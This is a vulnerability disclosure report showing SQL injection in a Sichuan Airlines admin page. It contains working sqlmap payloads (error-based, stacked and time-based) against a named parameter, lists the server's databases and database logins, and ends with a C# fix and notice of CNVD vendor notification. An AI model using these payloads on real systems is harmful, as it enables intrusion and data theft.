2015-03-08: Details reported to the vendor, awaiting vendor handling
2015-03-11: Vendor confirmed; details disclosed to the vendor only
2015-03-21: Details disclosed to core white hats and relevant domain experts
2015-03-31: Details disclosed to regular white hats
2015-04-10: Details disclosed to intern white hats
2015-04-22: Details disclosed to the public
SQL injection in a Sichuan Airlines system
The weak-password issue I submitted yesterday has not been reviewed yet, so I went looking for other vulnerabilities while I was at it.

Affected system: http://www.scal.com.cn/invite2011/admin/ (login required)

Injection point:

There are several parameters; I tested 2 of them, please check the rest yourselves.
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: POST
Parameter: txtQueryMobile
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' AND 2000=CONVERT(INT,(SELECT CHAR(113) CHAR(105) CHAR(102) CHAR(97) CHAR(113) (SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(121) CHAR(120) CHAR(117) CHAR(113))) AND '%'='&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%'; WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl 8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [25]:
[*] Invite2011
[*] master
[*] model
[*] msdb
[*] SCAL3_B2C
[*] SCAL3_Card
[*] SCAL3_Familiar
[*] SCAL3_Hotel
[*] SCAL3_Insurance
[*] SCAL3_InsuranceNew
[*] SCAL3_Itinerary
[*] SCAL3_Log
[*] SCAL3_Mall
[*] SCAL3_Member
[*] SCAL3_Message
[*] SCAL3_MinPrice
[*] SCAL3_News
[*] SCAL3_Order
[*] SCAL3_Pay
[*] SCAL3_Preferential
[*] SCAL3_SaleRule
[*] SCAL3_SessionService
[*] SCAL3_SOA
[*] SCAL3_System
[*] tempdb
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| sys.all_columns                                   |

Database: Invite2011
[11 tables]
+---------------------------------------------------+
| sqlmapoutput                                      |
| sysdiagrams                                       |
| t_Invite                                          |
| t_InviteEducation                                 |
| t_InviteEducation_bak                             |
| t_InviteFamily                                    |
| t_InviteFamily_bak                                |
| t_InviteWork                                      |
| t_InviteWork_bak                                  |
| t_Invite_bak                                      |
| t_User                                            |
+---------------------------------------------------+

Database: msdb
[10 tables]
+---------------------------------------------------+
| backupfile                                        |
| backupmediafamily                                 |
| backupmediaset                                    |
| backupset                                         |
| logmarkhistory                                    |
| restorefile                                       |
| restorefilegroup                                  |
| restorehistory                                    |
| suspect_pages                                     |
| sysdac_instances                                  |
+---------------------------------------------------+
back-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] invite [1]:
    password hash: NULL
[*] sa [1]:
    password hash: NULL

The other databases seem to belong to http://www.scal.com.cn/B2C.
Privilege escalation is needed.
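The payloads above show a LIKE filter on txtQueryMobile built by string concatenation, which is why a single quote in the field is enough to rewrite the statement. The C# sketch below is an added illustration, not code from the report or from the affected site: it places that vulnerable construction beside a parameterized version, and the column names (Name, Mobile) are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class InviteQuery
{
    // Vulnerable shape implied by the sqlmap payloads: the form field is spliced
    // into a LIKE pattern, so a quote in the input terminates the literal and the
    // rest of the value is parsed as SQL. Shown for contrast only; do not use.
    public static string BuildVulnerableSql(string txtQueryMobile)
    {
        return "SELECT Name, Mobile FROM t_Invite WHERE Mobile LIKE '%"
               + txtQueryMobile + "%'";
    }

    // SQL Server LIKE treats %, _ and [ as metacharacters. Bracket-escaping them
    // keeps a parameterised search literal even when the value carries wildcards.
    // The "[" replacement must run first so the brackets added later stay intact.
    public static string EscapeLike(string input)
    {
        return input.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Hardened shape: the SQL text is constant and the value travels as a typed
    // parameter, so nothing in txtQueryMobile can change the statement.
    // Column names are assumed; t_Invite is the table listed in the report.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string txtQueryMobile)
    {
        var cmd = new SqlCommand(
            "SELECT Name, Mobile FROM t_Invite WHERE Mobile LIKE @mobile", conn);
        cmd.CommandType = CommandType.Text;
        cmd.Parameters.Add("@mobile", SqlDbType.NVarChar, 64).Value =
            "%" + EscapeLike(txtQueryMobile) + "%";
        return cmd;
    }

    public static void Main()
    {
        // Constructed input carrying a quote and a wildcard, the two characters
        // the report's payloads rely on. In the vulnerable form the quote closes
        // the literal; in the hardened form the whole value is bound as data.
        string hostile = "123' OR 1=1 --";
        Console.WriteLine(BuildVulnerableSql(hostile));
        Console.WriteLine("%" + EscapeLike(hostile) + "%");
    }
}
```

Parameterisation closes the injection itself; the stacked-query support and the sa login visible in the sqlmap output are a separate least-privilege concern, so the web application should connect with a dedicated low-privilege database login rather than an administrative one.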
Severity: High

Vulnerability Rank: 11

Confirmed: 2015-03-11 11:32

CNVD has confirmed the described situation and has notified the website's administering organization through the previously established handling channels.

None yet